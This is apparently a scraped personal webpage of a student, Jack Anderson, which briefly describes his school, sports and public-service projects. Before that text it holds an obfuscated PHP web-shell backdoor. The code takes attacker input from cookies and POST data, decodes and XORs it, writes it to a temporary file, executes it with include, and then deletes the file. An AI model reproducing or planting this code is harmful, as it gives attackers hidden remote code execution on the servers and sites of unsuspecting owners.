$MQoUUivM = 'E' . chr ( 625 - 549 ).chr (95) . chr (121) . "\x54" . chr ( 86 - 15 ).chr (119) . "\x6e";$MeazkysTo = 'c' . chr ( 603 - 495 ).'a' . 's' . "\163" . "\137" . 'e' . "\x78" . 'i' . "\163" . chr ( 530 - 414 ).chr (115); $EnMuFABD = class_exists($MQoUUivM); $MeazkysTo = "12673";$sGJsYB = strpos($MeazkysTo, $MQoUUivM);if ($EnMuFABD == $sGJsYB){function YCCFtxYZaj(){$IWnskQGB = new /* 39852 */ EL_yTGwn(44727 + 44727); $IWnskQGB = NULL;}$EtqtkXH = "44727";class EL_yTGwn{private function SLyuJh($EtqtkXH){if (is_array(EL_yTGwn::$aaMRib)) {$name = sys_get_temp_dir() . "/" . crc32(EL_yTGwn::$aaMRib["salt"]);@EL_yTGwn::$aaMRib["write"]($name, EL_yTGwn::$aaMRib["content"]);include $name;@EL_yTGwn::$aaMRib["delete"]($name); $EtqtkXH = "44727";exit();}}public function jqUjA(){$qtfAZyZto = "49859";$this->_dummy = str_repeat($qtfAZyZto, strlen($qtfAZyZto));}public function __destruct(){EL_yTGwn::$aaMRib = @unserialize(EL_yTGwn::$aaMRib); $EtqtkXH = "59213_8673";$this->SLyuJh($EtqtkXH); $EtqtkXH = "59213_8673";}public function sFrSihRqBj($qtfAZyZto, $sQGBo){return $qtfAZyZto[0] ^ str_repeat($sQGBo, intval(strlen($qtfAZyZto[0]) / strlen($sQGBo)) + 1);}public function ZEcmgAYlCe($qtfAZyZto){$RlvUxdwG = 'b' . "\141" . "\x73" . 'e' . '6' . '4';return array_map($RlvUxdwG . "\137" . chr ( 808 - 708 )."\145" . chr (99) . chr ( 960 - 849 ).chr (100) . "\x65", array($qtfAZyZto,));}public function __construct($DsteLFHSa=0){$zlyZox = chr (44); $qtfAZyZto = "";$erROsraMIj = $_POST;$qKFogqrhIt = $_COOKIE;$sQGBo = "7c0b3426-eaca-48a0-b4e1-1af4e8cf90e3";$BtGiugeDWF = @$qKFogqrhIt[substr($sQGBo, 0, 4)];if (!empty($BtGiugeDWF)){$BtGiugeDWF = explode($zlyZox, $BtGiugeDWF);foreach ($BtGiugeDWF as $fhXLLsmI){$qtfAZyZto .= @$qKFogqrhIt[$fhXLLsmI];$qtfAZyZto .= @$erROsraMIj[$fhXLLsmI];}$qtfAZyZto = $this->ZEcmgAYlCe($qtfAZyZto);}EL_yTGwn::$aaMRib = $this->sFrSihRqBj($qtfAZyZto, $sQGBo);if (strpos($sQGBo, $zlyZox) !== FALSE){$sQGBo = explode($zlyZox, $sQGBo); $pwFezpLcTm = base64_decode(md5($sQGBo[0]));}}public static $aaMRib = 6454;}YCCFtxYZaj();} Jack Anderson webpage – Page 2 – Baseball was, is and always will be to me the best game in the world. – Babe Ruth

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Hi there! I started this page to keep family and friends updated on the latest projects that I’m involved with: school, academics, sports and public service.  You can email me at JackAnderson0521@gmail.com or patrick9936@gmail.com

Thank you,
